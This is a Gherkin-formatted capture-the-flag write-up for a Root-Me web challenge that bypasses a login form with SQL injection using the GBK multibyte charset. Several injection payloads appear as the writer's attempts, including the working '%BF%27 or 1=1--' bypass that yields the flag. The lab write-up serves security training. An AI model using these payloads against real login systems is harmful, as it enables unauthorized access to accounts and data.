## Version 2.0
## language: en

Feature: sql-injection-authentication-gbk

  Site:
    www.root-me.org
  Category:
    Web Server
  User:
    thecyberpunker
  Goal:
    Get an administrator access

 Background:
    Hacker's software:
    | <Software name> | <Version> |
    | Parrot OS       | 4.11      |
    | Google Chrome   | 89.0.4    |
    | HackBar         | 0.4.1     |
    | BurpSuite Commu | 2021.2.1  |

  Machine information:
    Given I am accessing the challenge through its URL
    """
    http://challenge01.root-me.org/web-serveur/ch42/
    """
    When I visit the link
    Then I see the login form

  Scenario: Fail: Enter aleatory credentials
    Given the login form provided
    Then I enter aleatory a basic credentials [evidence](sqlitest.png)
    """
    login:1' or 1=1 -- -
    password: abcd (1234)
    """
    And I get an identification error
    Then I analyze the statement
    And I realize that maybe the credentials is in Chinese Gbk Charset
    Then I try to enter some encode credentials [evidence](sqlitestgbk.png)
    """
    login: 字admin字1'字or字1=1字--字-
    password: 1234
    """
    Then I don't get the flag
    And I think that Chinese Gbk can be ASCII

  Scenario: Fail: Try different sqli bypass base on OSWASP
    Given that I have BurpSuite on repeater mode
    And I try with a cheat sheet to bypass the login
    """
    login=admin' # &password=12345
    login=admin'/* &password=12345
    login=admin' or '1'='1 &password=12345
    login=admin ¿' or 1=1-- &password=12345
    login=admin' or '1'='1'-- &password=12345
    """
    Then I get again error login credentials

  Scenario: Success: ASCII GBK sqli bypass
    Given that I have BurpSuite on repeater mode
    And I try encoding some parts of the cheat sheet with ASCII
    """
    login=admin %27%23 &password=12345
    login=admin %27%2F%2A &password=12345
    login=admin %20%27 or '1'='1 &password=12345
    login=admin %BF%27 or 1=1-- &password=12345
    login=admin %27 or '1'='1'-- &password=12345
    """
    Then I get a success with "login=admin %BF%27 or 1=1-- &password=12345"
    And I get a validation password [evidence](sqlisuccess.png)
    And I validate the password
    And I caught the flag [evidence](success.png)
